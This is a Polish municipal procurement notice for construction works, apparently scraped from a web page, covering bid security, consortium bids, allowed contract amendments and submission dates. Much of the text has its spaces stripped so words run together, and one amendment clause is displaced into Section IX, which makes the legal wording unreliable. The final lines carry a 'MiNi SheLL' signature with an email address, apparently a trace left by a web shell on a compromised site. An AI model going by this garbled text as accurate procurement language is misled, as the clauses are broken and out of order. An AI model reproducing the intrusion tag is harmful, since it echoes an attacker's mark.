konawcy,któregoofertazostaławybranajakonajkorzystniejsza;4)pounieważnieniupostępowania,wprzypadku,gdyniezostałorozstrzygnięteodwołanienaczynnośćunieważnieniaalbonieupłynąłtermindojegowniesienia.9.Złożeniewnioskuozwrotwadium,októrymmowawpkt.24.7,powodujerozwiązaniestosunkuprawnegozWykonawcąwrazzutratąprzezniegoprawadokorzystaniaześrodkówochronyprawnej.10.Zamawiającyzwracawadiumwniesionewpieniądzuwrazzodsetkamiwynikającymizumowyrachunkubankowego,naktórymbyłoonoprzechowywane,pomniejszoneokosztyprowadzeniarachunkubankowegoorazprowizjibankowejzaprzelewpieniędzynarachunekbankowywskazanyprzezWykonawcę.11.Zamawiającyzwracawadiumwniesionewinnejformieniżwpieniądzupoprzezzłożeniegwarantowilubporęczycielowioświadczeniaozwolnieniuwadium.12.Zamawiającyzatrzymujewadiumwrazzodsetkami,awprzypadkuwadiumwniesionegowformiegwarancjilubporęczenia,występujeodpowiedniodogwarantalubporęczycielazżądaniemzapłatywadium,wokolicznościachwskazanychwart.98ust.6ustawyPZP.1.Wprzypadku,gdyWykonawcaniewniósłwadiumlubwniósłwsposóbnieprawidłowylubnieutrzymałwadiumnieprzerwaniedoupływuterminuzwiązaniaofertąlubzłożyłwniosekozwrotwadium,wprzypadku,októrymmowawart.98ust.2pkt3ustawyPzp,Zamawiającyodrzuciofertęnapodstawieart.226ust.1pkt14ustawyPzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być:<br/>a)	wspólnicy spółki cywilnej – w rozumieniu przepisów art. 860-875 KC,<br/>b)	Wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się o udzielenie zamówienia publicznego, nie będący spółką cywilną w rozumieniu przepisów KC np.: tak zwane „konsorcjum” dwóch lub więcej podmiotów gospodarczych,<br/>2)	w takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, albo reprezentowania, w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, <br/>3)	dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania; - pełnomocnictwo winno być podpisane przez wszystkich tych Wykonawców ubiegających się wspólnie o zamówienie publiczne, którzy ustanawiają pełnomocnika; - podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do centralnej ewidencji i informacji o działalności gospodarczej,<br/>4)	oferta winna być podpisana przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub upoważnionego pełnomocnika, <br/>5)	W przypadku wyboru, jako najkorzystniejszej, oferty składanej przez Wykonawców wspólnie ubiegających się o zamówienie, Wykonawcy, na żądanie Zamawiającego, zobowiązani są przed podpisaniem umowy, przedstawić Zamawiającemu umowę regulującą współpracę tych Wykonawców, zawierającą w szczególności: <br/>a)	wskazania reguł ponoszenia odpowiedzialności przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>b)	wskazania podmiotu, który będzie wystawcą faktury w ramach realizacji zamówienia, <br/>c)	wskazania podmiotu, który będzie ich reprezentował w stosunkach zewnętrznych, <br/>d)	zapis, z którego wynika, że umowa regulująca współpracę tych Wykonawców nie może zostać rozwiązana przed zakończeniem realizacji zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wszelkiezmianyiuzupełnieniatreścininiejszejumowywymagająformypisemnej,podrygoremnieważności,zuwzględnieniempostanowień§20ust.6umowy.2.Zamawiający,wszczególnościwoparciuoart.455ust.1pkt1ustawyPzp,dopuszczamożliwośćwprowadzeniazmianytreściumowy,wstosunkudotreścioferty,napodstawiektórejdokonanowyboruWykonawcy,wszczególnościwzakresie:1)zmianyterminukońcowegowprzypadku:a)nieterminowegoprzekazaniaterenubudowy,b)wystąpieniasiływyższej,c)wyjątkowoniesprzyjającychwarunkówatmosferycznychtj.długotrwałe,trwającenieprzerwaniepoprzezokres,conajmniej7dni:silnemrozyponiżej-10stopniC,ponadnormoweopadyśniegu,ulewnedeszcze,wysokietemperaturypowyżej30stopniC;-uniemożliwiającychprowadzenierobótbudowlanych,zzachowaniemwymaganejtechnologii,przeprowadzeniepróbisprawdzeń,dokonywanieodbiorów,d)koniecznościwykonaniarobótnieprzewidzianychwpostępowaniuoudzieleniezamówieniapublicznego,apolegającychnapodniesieniuwarunkówużytkowychobiektu,zmianiefunkcji,podniesieniajakościwykończenialubwyposażenia,wprowadzeniuzmianpolegającychnaobniżeniukosztuobiektubudowlanego,e)związkuzokolicznościaminiemającymizwiązkuzprowadzonymirobotamibudowlanymi,awynikającymizprowadzonejprzezinwestoradziałalności,f)przedłużeniaproceduryudzieleniaprzedmiotowegozamówieniapublicznegopoprzezśrodkiochronyprawnejwykorzystywaneprzezwykonawcówlubinnepodmiotyprzedzawarciemumowy,gdyterminzakończeniarobótokreślonyzostałdatą,g)napotkaniawarunkówfizycznychnieprzewidywalnych,mającychwpływnawydłużenieprocesuinwestycyjnego,zmianrobótbudowlanychwprowadzonychdecyzjamiadministracyjnymiwydanymi,lubktóreuzyskaływalorostatecznościpodniurozstrzygnięciapostępowaniaskutkującegopodpisaniemniniejszejumowyidotyczącymistronumowy,obiektubudowlanego,prowadzonychrobótbudowlanychlubinnychokolicznościmającychzwiązekzprzedmiotemumowy,h)zmianyzakresurobótprzezinwestoralubkoniecznościwykonaniainnychrobótdodatkowych(zamiennych),i)zmianspowodowanychnieprzewidzianymiwdokumentacjiprojektowejispecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanychwarunkamigeologicznymi,archeologicznymilubterenowymi,wszczególności:niewypałyiniewybuchy,wykopaliskaarcheologiczne,j)odmiennychodprzyjętychwdokumentacjiprojektowejwarunkówgeologicznych,aleistotnychdlarealizacjiprzedmiotuzamówienia,k)odmiennych(aleistotnychdlarealizacjiprzedmiotuzamówienia)odprzyjętychwdokumentacjiprojektowejwarunkówterenowych,wszczególnościistnieniepodziemnychsieci,instalacji,urządzeńlubniezinwentaryzowanychalbobłędniezinwentaryzowanychobiektówbudowlanych(bunkry,fundamenty,ścianyszczelne,itp.),l)zmianysposobuwykonaniaprzedmiotuumowynaskutekwystąpieniaokolicznościprzewidzianychwpkt.3.-podwarunkiempodpisaniaprzezstronyporozumieniawsprawiezmianyterminu.2)aktualizacjiharmonogramupracwmiarępotrzeb,zzachowaniemterminukońcowego,októrymmowaw§2ust.1umowy,zuwzględnieniempostanowień§19ust.5umowy(jeżelidotyczy),3)sposobuwykonaniaprzedmiotuumowy,wprzypadku:a)stwierdzeniawadlubwprowadzeniazmianwdokumentacjiprojektowej,skutkującychkoniecznościądokonaniapopraweklubuzupełnień,którychniemożnabyłowcześniejprzewidzieć,b)niedostępnościnarynkumateriałówluburządzeńwskazanychwdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowalnychspowodowanejzaprzestaniemprodukcjilubwycofaniemzrynkutychmateriałówluburządzeń,c)pojawieniasięnarynkumateriałówluburządzeńnowszejgeneracji,pozwalającychnazaoszczędzeniekosztówrealizacjiprzedmiotuumowylubkosztóweksploatacjiwykonanegoprzedmiotuumowy,lubumożliwiającychuzyskanielepszejjakościrobót,d)pojawieniasięnowszej2.technologiiwykonaniazaprojektowanychrobót,pozwalającejnazaoszczędzenieczasurealizacjiprzedmiotuumowylubkosztówwykonywanychprac,jakrównieżkosztóweksploatacjiwykonanegoprzedmiotuumowye)celowościlubkoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuinnychrozwiązańtechnicznych/technologicznychniżwskazanewdokumentacjiprojektowejlubspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,wynikającejzokoliczności,którychniemożnabyłoprzewidzieć, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-05 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> f)wystąpieniawarunkówterenowychodbiegającychwsposóbistotnyodprzyjętychwdokumentacjiprojektowej,wszczególnościbrakuzinwentaryzowaniaobiektówbudowlanychlubzinwentaryzowaniaobiektówbudowlanychwsposóbwadliwy,g)wystąpieniakoniecznościzrealizowaniaprzedmiotuumowyprzyzastosowaniuodmiennychrozwiązańtechnicznych,technologicznychlubmateriałowychniżwskazanowdokumentacjiprojektowej,zewzględunazmianyobowiązującegoprawa,h)wystąpienianiebezpieczeństwakolizjizinwestycjamiplanowanymilubrównolegleprowadzonymiprzezinnepodmiotywzakresieniezbędnymdouniknięcialubusunięciatychkolizji,i)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywsposóbprzewidzianywdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,4)zakresuprzedmiotuumowywprzypadku:a)podjęciaprzezosobytrzeciedziałańuniemożliwiającychlubutrudniającychwykonanieprzedmiotuumowywzakresieprzewidzianymwdokumentacjiprojektowejlubwspecyfikacjitechnicznejwykonaniaiodbiorurobótbudowlanych,któretodziałanianiesąkonsekwencjąwinyktórejkolwiekzestronumowy,b)rezygnacjiprzezZamawiającegozwykonaniaczęściprzedmiotuumowywrazieuznaniaichwykonaniazazbędne,czegoniemożnabyłowcześniejprzewidzieć,c)wykonanianieprzewidzianychrobótniezbędnychdorealizacjiprzedmiotuumowy,5)zmianywysokościwynagrodzenianależnegoWykonawcy,wprzypadkuzmiany:a)wysokościpodatkuodtowarówiusługorazpodatkuakcyzowego,b)wysokościminimalnegowynagrodzeniazapracęalbowysokościminimalnejstawkigodzinowej,ustalonychnapodstawieustawyzdnia10października2002r.ominimalnymwynagrodzeniuzapracę,c)zasadpodleganiaubezpieczeniomspołecznymlububezpieczeniuzdrowotnemulubwysokościstawkiskładkinaubezpieczeniaspołecznelubzdrowotne,d)zasadgromadzeniaiwysokościwpłatdopracowniczychplanówkapitałowych,októrychmowawustawiezdnia4października2018r.opracowniczychplanachkapitałowych(Dz.U.z2020r.poz.1342zezm.),-jeżelizmianytebędąmiaływpływnakosztywykonaniazamówieniaprzezWykonawcę;-wprzypadku,októrymmowawlit.b,cid,Wykonawca,wterminie30dnioddniawejściawżycieprzepisówdokonującychtychzmian,zobowiązanyjestprzedstawić,wformiepisemnej,wniosekuzasadniającyzwiększeniewynagrodzenia,e)naskuteksytuacjiniemożliwychdoprzewidzeniawmomenciepodpisywaniaumowy,októrychmowaw§1ust.5,6,7,8niniejszejumowy,6)zamianylubwprowadzenianowychpodwykonawców,podwarunkiemuzyskaniazgodyZamawiającego,nazasadachokreślonychwumowie,7)zmianyformyzabezpieczenianawniosekWykonawcy,zgodniezustawąPzp,podwarunkiemzachowaniaciągłościzabezpieczeniaibezzmniejszeniajegowartości,8)zmianydanychWykonawcynp.zmianasiedziby,adresu,nazwy(bezzmianysamegoWykonawcy),9)wystąpieniarozbieżnościlubniejasnościwrozumieniupojęćużytychwumowie,którychniemożnabyłousunąćwinnysposób,azmianatakabędzieumożliwiaćusunięcierozbieżnościidoprecyzowanieumowywcelujednoznacznejinterpretacji.3.Wprzedstawionychwust.2pkt1przypadkachwystąpieniaopóźnieństronyustaląnoweterminy,ztymżemaksymalnyokresprzesunięciaterminuzakończeniarealizacjiprzedmiotuumowyrównybędzieuzasadnionemuokresowiprzerwylubpostoju.4.Wprzypadkuzmianwumowie,niedoprecyzowanychwniniejszymparagrafie,majązastosowanieodpowiedniepostanowieniaart.454orazart.455ustawyPzp.Doofertynależydołączyćdokumentyoktórychmowawpkt9.7SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com